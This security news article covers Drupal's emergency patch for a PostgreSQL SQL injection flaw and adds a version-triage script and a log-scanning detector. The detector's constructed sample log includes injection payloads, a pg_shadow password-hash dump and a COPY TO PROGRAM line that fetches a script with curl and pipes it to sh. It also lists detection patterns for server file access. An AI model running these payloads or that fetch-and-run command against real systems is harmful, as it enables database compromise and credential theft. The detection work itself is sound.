Drupal Releases Emergency Patch for Critical SQL Injection Flaw (CVE-2026-9082) Affecting PostgreSQL Sites
Drupal released an emergency patch for a highly critical SQL injection vulnerability (CVE-2026-9082) in its database abstraction API, affecting all supported branches and potentially allowing anonymous attackers to execute arbitrary SQL on PostgreSQL sites.

Drupal published an urgent security advisory on May 20, 2026, disclosing a highly critical SQL injection vulnerability (CVE-2026-9082) in its core database abstraction API. The flaw carries a risk score of 20 out of 25 on the NIST Common Misuse Scoring System scale the Drupal Security Team uses (this is not a CVSS score). It affects Drupal core from version 8.9.0 through 11.3.9, which covers every supported branch, though exploitation is limited to sites running on PostgreSQL. The Drupal Security Team warned that exploit code could be developed within hours or days of the patch release, mirroring the urgency signaled in a pre-advisory notice issued earlier this week.
The vulnerability resides in Drupal's database abstraction layer, the API that core and contributed modules use to build parameterized queries and that is supposed to prevent SQL injection by construction. A flaw in this API allows an attacker to send specially crafted requests that bypass that protection, resulting in arbitrary SQL injection on PostgreSQL-backed sites; the advisory does not describe the bypass itself. According to the advisory, this can lead to information disclosure, privilege escalation, remote code execution, or other attacks. Critically, the vulnerability can be exploited by anonymous users: no authentication is required, so the flaw is exposed to any visitor and hardening the login path does not reduce exposure.
Drupal has released patched versions 10.4.10, 10.5.10, 10.6.9, 11.1.10, 11.2.12, and 11.3.10. For branches that are end of life, such as Drupal 8.9, 9.x, 10.4.x and earlier, and 11.0.x, the security team has provided best-effort patches, but those branches no longer receive security coverage and remain exposed to other previously disclosed issues, so the patch is a stopgap ahead of an upgrade to a supported branch. The advisory strongly recommends that all site administrators update immediately, regardless of whether they use PostgreSQL, because the release also includes critical upstream security fixes for the Symfony and Twig dependencies.
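The version and driver triage that the advisory implies, as an added example rather than anything published by Drupal: it takes the core version string and the database driver name from settings.php and returns whether the install is in the affected range, whether the injection is reachable (PostgreSQL only), and which of the advisory's actions applies. The fixed releases, the affected range and the end-of-life branches are the ones stated in the article; the driver spellings accepted and the output shape are assumptions of this example.

```python
"""Added example, not Drupal project code: triage a site against the
CVE-2026-9082 advisory from its core version and database driver.
Fixed releases, affected range and end-of-life branches are those named
in the article; accepted driver spellings and the result layout are
assumptions of this example."""
from __future__ import annotations

# Fixed release per minor branch, as listed in the advisory.
FIXED_RELEASE: dict[tuple[int, int], tuple[int, int, int]] = {
    (10, 4): (10, 4, 10),
    (10, 5): (10, 5, 10),
    (10, 6): (10, 6, 9),
    (11, 1): (11, 1, 10),
    (11, 2): (11, 2, 12),
    (11, 3): (11, 3, 10),
}
# Affected range named in the advisory: 8.9.0 through 11.3.9.
AFFECTED_LOW, AFFECTED_HIGH = (8, 9, 0), (11, 3, 9)
# Drupal's PostgreSQL driver key in settings.php is 'pgsql'; the other
# spellings are accepted (assumption) in case the value is typed by hand.
POSTGRES_DRIVERS = {"pgsql", "postgresql", "postgres"}


def parse_version(version: str) -> tuple[int, int, int]:
    """Parse '11.2.3' or '10.5.10-rc1' into a comparable tuple.
    Pre-release and build suffixes are dropped; '11.x-dev' style strings
    are rejected because a dev checkout has no patch level to compare."""
    core = version.strip().split("-", 1)[0].split("+", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Drupal core version: {version!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch


def is_end_of_life(branch: tuple[int, int]) -> bool:
    """Branches the article calls end of life: 10.4.x and earlier
    (which includes 8.9 and 9.x) and 11.0.x."""
    return branch < (10, 5) or branch == (11, 0)


def triage(version: str, db_driver: str) -> dict:
    """Return a verdict: affected range membership, whether the SQL
    injection is reachable (PostgreSQL only) and the action to take."""
    v = parse_version(version)
    branch = v[:2]
    fixed = FIXED_RELEASE.get(branch)
    in_range = AFFECTED_LOW <= v <= AFFECTED_HIGH
    patched = fixed is not None and v >= fixed
    eol = is_end_of_life(branch)
    on_postgres = db_driver.strip().lower() in POSTGRES_DRIVERS
    needs_update = in_range and not patched
    sqli_exposed = needs_update and on_postgres

    if patched:
        action = "already at or above the fixed release for this branch"
    elif not in_range:
        action = "outside the range this advisory lists; verify against the current advisory"
    elif eol:
        action = "branch is end of life: apply the best-effort patch and plan a migration"
        if fixed:
            action += f" (best-effort release {'.'.join(map(str, fixed))})"
    else:
        action = f"update to {'.'.join(map(str, fixed))}"
    if needs_update and not on_postgres:
        action += "; injection not reachable without PostgreSQL, but the release also carries Symfony and Twig fixes"

    return {
        "version": v, "branch": branch, "patched": patched, "eol": eol,
        "on_postgres": on_postgres, "sqli_exposed": sqli_exposed,
        "needs_update": needs_update, "action": action,
    }


if __name__ == "__main__":
    # Constructed inputs; on a real site read $settings['databases']['default']['default']['driver'].
    for ver, drv in [("11.3.9", "pgsql"), ("10.5.3", "mysql"), ("9.5.11", "pgsql"), ("11.3.10", "pgsql")]:
        r = triage(ver, drv)
        print(f"{ver:8} {drv:6} exposed={r['sqli_exposed']!s:5} {r['action']}")
```

The version string can be taken from `drush status` or from `\Drupal::VERSION`; the driver from the `driver` key of the default database connection in settings.php.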
The vulnerability was reported by Michael Maturi and fixed by a group of Drupal Security Team members including Björn Brala, Benji Fisher, catch, Lee Rowlands, Dave Long, and Drew Webber. The coordinated release also bundles security updates for Symfony and Twig, which have published their own advisories. Drupal warned that sites with custom configurations or contributed modules that let users edit Twig templates, for example through Views, may be at additional risk from the Twig issue and should review which roles hold that permission.
This incident follows a run of critical SQL injection flaws in widely deployed software. Earlier in May 2026, CISA added a SQL injection vulnerability in BerriAI LiteLLM to its Known Exploited Vulnerabilities catalog, and SAP patched a critical SQL injection in S/4HANA. The Drupal flaw stands out because of its severity, its anonymous exploitability, and Drupal's installed base, estimated at over 1 million sites worldwide. Administrators are urged to apply the patches immediately and to look for signs of compromise, especially on PostgreSQL-backed deployments: review the PostgreSQL server logs for unexpected statements from the application role, and audit administrator accounts, database roles, and installed extensions for changes they did not make.
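One way to do that log review, as an added example that is not part of the advisory or of Drupal: scan PostgreSQL server log lines for the probing and post-exploitation primitives an attacker would reach through a SQL injection into a pgsql-backed site (error bursts from the application role, `pg_sleep` for blind injection, catalog enumeration, server-side file access, `COPY ... TO PROGRAM`, untrusted-language functions). The indicators are generic PostgreSQL ones, not a signature for CVE-2026-9082, whose exploit details are not public on this page; the log lines are constructed and assume the default `log_line_prefix` style `%m [%p] %u@%d` with `log_statement = 'all'`.

```python
"""Added example (not from the Drupal advisory): flag generic SQL injection
probing and post-exploitation primitives in PostgreSQL server logs.
Assumes log_line_prefix = '%m [%p] %u@%d ' and log_statement = 'all'.
Sample lines below are constructed for this example."""
import re
from collections import Counter

# (tag, severity, pattern). Ordered roughly from loudest primitive down.
INDICATORS = [
    ("copy_program", "critical",
     re.compile(r"\bCOPY\b.*\b(TO|FROM)\s+PROGRAM\b", re.I | re.S)),
    ("untrusted_language_function", "critical",
     re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+(plpython\w*|plperlu|c)\b", re.I | re.S)),
    ("server_file_access", "high",
     re.compile(r"\b(pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import|lo_export)\s*\(", re.I)),
    ("dblink", "high", re.compile(r"\bdblink(_connect)?\s*\(", re.I)),
    ("time_based_blind", "medium", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("catalog_enumeration", "medium",
     re.compile(r"\bUNION\b.*\bSELECT\b.*\b(pg_catalog|information_schema|pg_shadow|pg_user)\b", re.I | re.S)),
    ("version_probe", "low", re.compile(r"\bversion\s*\(\s*\)", re.I)),
]
# Parser errors that injection probing typically produces.
ERROR_PROBE_RE = re.compile(r"syntax error|unterminated quoted|invalid input syntax", re.I)
# One log entry per line; continuation lines of multi-line statements are skipped.
LOG_RE = re.compile(r"^(?P<ts>.+?) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) (?P<level>\w+):\s*(?P<msg>.*)$")

# Constructed sample: an application role probing, then escalating.
SAMPLE_LOG = """\
2026-05-21 10:15:01 UTC [4021] drupal@drupal LOG:  statement: SELECT nid FROM node_field_data WHERE status = 1 LIMIT 10
2026-05-21 10:15:02 UTC [4021] drupal@drupal ERROR:  unterminated quoted string at or near "'"
2026-05-21 10:15:02 UTC [4021] drupal@drupal STATEMENT:  SELECT nid FROM node_field_data WHERE title = '''
2026-05-21 10:15:03 UTC [4021] drupal@drupal ERROR:  syntax error at or near "OR"
2026-05-21 10:15:03 UTC [4021] drupal@drupal STATEMENT:  SELECT nid FROM node_field_data WHERE title = '' OR 1=1 --'
2026-05-21 10:15:04 UTC [4021] drupal@drupal ERROR:  syntax error at or near ")"
2026-05-21 10:15:05 UTC [4021] drupal@drupal LOG:  statement: SELECT 1 FROM users_field_data WHERE uid = 1 AND 1=(SELECT 1 FROM pg_sleep(5))
2026-05-21 10:15:07 UTC [4021] drupal@drupal LOG:  statement: SELECT name, pass FROM users_field_data UNION SELECT usename, passwd FROM pg_catalog.pg_shadow
2026-05-21 10:15:09 UTC [4021] drupal@drupal LOG:  statement: COPY (SELECT '') TO PROGRAM 'curl http://198.51.100.7/x | sh'
2026-05-21 10:15:10 UTC [4022] app@inventory LOG:  statement: SELECT version()
"""


def scan(text: str, burst_threshold: int = 3) -> list[dict]:
    """Return one finding per indicator hit, plus a per-role finding when
    parser errors reach burst_threshold (a sign of injection probing)."""
    findings = []
    probe_errors = Counter()
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(raw)
        if not m:
            continue
        user, level, msg = m["user"], m["level"], m["msg"]
        if level == "ERROR" and ERROR_PROBE_RE.search(msg):
            probe_errors[user] += 1
        for tag, severity, rx in INDICATORS:
            if rx.search(msg):
                findings.append({"line": lineno, "user": user, "tag": tag,
                                 "severity": severity, "sql": msg})
    for user, n in probe_errors.items():
        if n >= burst_threshold:
            findings.append({"line": None, "user": user, "tag": "syntax_error_burst",
                             "severity": "medium", "count": n})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['tag']:28} line={f['line']} user={f['user']}")
```

Run it against `postgresql-*.log` from the period since the pre-advisory notice; `COPY ... TO PROGRAM` and `CREATE FUNCTION ... LANGUAGE c` only succeed for a superuser or a role holding `pg_execute_server_program`, which is one more reason the application role should hold neither.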